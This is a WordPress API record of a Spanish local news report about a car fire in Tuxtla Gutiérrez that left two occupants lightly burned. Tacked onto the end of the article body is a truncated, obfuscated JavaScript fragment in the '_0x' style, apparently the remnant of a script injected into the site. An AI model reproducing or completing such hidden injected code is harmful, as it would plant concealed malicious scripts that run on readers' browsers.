{"id":20063,"date":"2025-01-28T08:04:05","date_gmt":"2025-01-28T08:04:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20063"},"modified":"2025-01-28T08:04:06","modified_gmt":"2025-01-28T08:04:06","slug":"se-incendia-automovil-en-el-libramiento-sur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20063","title":{"rendered":"Se incendia autom\u00f3vil en el Libramiento Sur"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250128-WA0003-1024x768.jpg\" alt=\"\" class=\"wp-image-20064\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250128-WA0003-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250128-WA0003-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250128-WA0003-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250128-WA0003-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250128-WA0003.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 27 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana se incendi\u00f3 un veh\u00edculo MG de color azul cuando circulaba en el Libramiento Sur a la altura del Bulevar Andr\u00e9s Serra Rojas.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor del veh\u00edculo observ\u00f3 que sal\u00eda humo cuando circulaba de Poniente a Oriente.<\/p>\n\n\n\n<p>De manera repentina comenz\u00f3 a salir fuego del cofre de la unidad por lo que se baj\u00f3 del coche.<\/p>\n\n\n\n<p>Los dos ocupantes resultaron con leves quemaduras y crisis nerviosa.<\/p>\n\n\n\n<p>Los heridos fueron atendidos por elementos de la Cruz Roja Mexicana y los elementos de Bomberos apagaron el fuego.<\/p>\n\n\n\n<p>Finalmente el auto siniestrado fue trasladado a un corral\u00f3n en turno.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que la posible causa del incendio fue un corto circuito.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 27 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana se incendi\u00f3 un veh\u00edculo MG de color azul cuando circulaba en el Libramiento Sur a la altura del Bulevar Andr\u00e9s Serra Rojas. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor del veh\u00edculo observ\u00f3 que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20064,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20063","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20063","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20063"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20063\/revisions"}],"predecessor-version":[{"id":20065,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20063\/revisions\/20065"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20064"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20063"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20063"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20063"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}